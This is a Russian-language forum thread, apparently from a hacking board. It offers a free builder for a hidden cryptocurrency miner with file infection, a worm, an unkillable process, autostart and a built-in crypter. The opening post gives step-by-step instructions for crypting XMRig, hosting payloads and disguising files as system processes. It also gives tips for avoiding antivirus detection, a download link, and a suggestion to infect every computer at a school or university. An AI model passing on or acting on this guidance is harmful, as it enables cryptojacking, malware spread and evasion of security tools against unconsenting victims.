[Бесплатно] SHUNMiner - билдер скрытого майнера!

Lollipop

Участник
Дней с нами
3.652
Розыгрыши
0
Сообщения
17
Репутация
28
Реакции
8
Доброго времени суток всем. Я, наконец, доделал это чудо, и теперь готов со всеми им поделиться.
bCepCEaJStuSoH6TKnI36A.png
Начнем с функционала:
  • Регулируемая нагрузка на процессор
  • Вывод сообщения при первом запуске
  • Настраиваемые процессы
  • Неубиваемый процесс майнера
  • Маленький размер билда
  • Возможность заражения файлов
  • Интервал старта майнинга
  • Автозагрузка майнера
  • Постоянная проверка файлов
  • Встроенный криптор .Net
  • Гибкая настройка
Из минусов данного софта:
  • Для запуска необходим fraimwork 2.0, а если пользовались моим криптором, то 3.5.
  • Криптованные файлы весят не так уж и мало.
  • Необходимо криптовать XMRig.
  • Трое суток под фенотропилом, возможно я что-то пропустил, так что тестируйте.
Теперь давайте расскажу про то, собственно, как им пользоваться.
  1. Для начала, необходимо закриптовать XMRig. Но так, чтобы в него можно было впихивать потом параметры. Криптуйте сами, либо покупайте крипт где-нибудь.
  2. Загружаем наш XMRig на любой файлообменник, облако, ftp и тд.
  3. Берем прямую ссылку и вставляем в самое первое текстовое поле билдера.
  4. Следующим шагом указываем имена процессов, при которых майнинг будет останавливаться.
  5. В поле "Название майнера" пишем имя файла, но без расширения (то есть пишем "program", а не "program.exe"). Придумывайте имена файлов более похожие на стандартные системные файлы, так будет меньше подозрений, если нас увидят в ДЗ.
  6. Процент нагрузки указываем от 15 до 75.
  7. Адрес пула берем на minergate, либо указывайте любой другой пул.
  8. Логин с minergate пишем в поле "Логин" (как бы это странно не было).
  9. В следующем поле указываем интервал таймера, по которому наш майнер будет запускаться. (От 1 до 600, вроде).
  10. "Директория загрузчика". Тут обязательно в конце пути пишем слэш "\".
  11. В поле "Имя загрузчика" наоборот необходимо указать расширение файла. (Обязательно, либо ничего не будет работать).
  12. Заполняем имя чекера, контроллера и, если необходимо, червя. (Также, как в 5 пункте, без расширения).
  13. Чекбокс "К" - криптовать файл, "Н" - неубиваемый процесс.
  14. Нажимаем кнопку "Собрать". Ждем около 10-15 секунд и загружаем наши 2-3 файла, опять же, на файлообменник и берем прямые ссылки на них.
  15. Нажимаем другую кнопку "Собрать" и наш билд готов.
Для, тех кому лень читать - видео мануал + показана работа майнера:


Если встроенный криптор начал палиться - убирайте чекбоксы "К" и криптуйте сами, благо тем в интернете куча.
ВАЖНО!!! Не лейте ничего на VT, а то и недели не проживет. Есть сайт nodistribute, он не посылает отчеты антивирусным компаниям. Проверяйте все файлы на нем.
P.S.
Да, билдер бесплатный и все такое, но мне будет идти от 15 до 25% мощности. Хорошо или плохо - решать вам, но, думаю, лучше дать немного мощности, чем отдавать кучу денег за приват майнеры. Спасибо большое всем, кто дочитал до конца и воспользовался данным софтом, для Вас отдельное место в... раю? А я уже завтра уезжаю служить. Очень хочу продолжать работу над этим проектом, но увы, обновления будут минимум через полтора года:(

Ну и лайфхак такой. Делаете билд с червем и заражаете все ПК в школе - ВУЗе - шараге. Профит будет хороший.

Ссылки:
Билдер
- http://rgho.st/6Y7rnCQsT
NoDistribute - В данный момент не работает. Если боитесь - запускайте на виртуалке.
 
Может для того, что бы не лили на вт нужно ставить хайд?
 
  • Like
Реакции: qww177
Может для того, что бы не лили на вт нужно ставить хайд?
я лайк поставить не могу :с
вечная загрузка в правом верхнем углу
и это уже не первый раз, а куки и кеш я чистить не хочу

#FixMiped
 
видел схему на другом форуме как в такие майнеры уже вшит майнер)
я бы такому не доверял
 
  • Like
Реакции: faseri
видел схему на другом форуме как в такие майнеры уже вшит майнер)
я бы такому не доверял
Я видел на одном форуме, как челик видел, как другой челик видел, что он видел :9:
 
Скинь пожалуйста исходник данного билда
 
Для начала, необходимо закриптовать XMRig.
для начало что такое XMRig.?
 
Как убедиться что в билде нет rat который в будущем сп*издит все боты?
 
а че по разрядности ОС 32/64? На XP пойдет?
 
  • Like
Реакции: alicemnt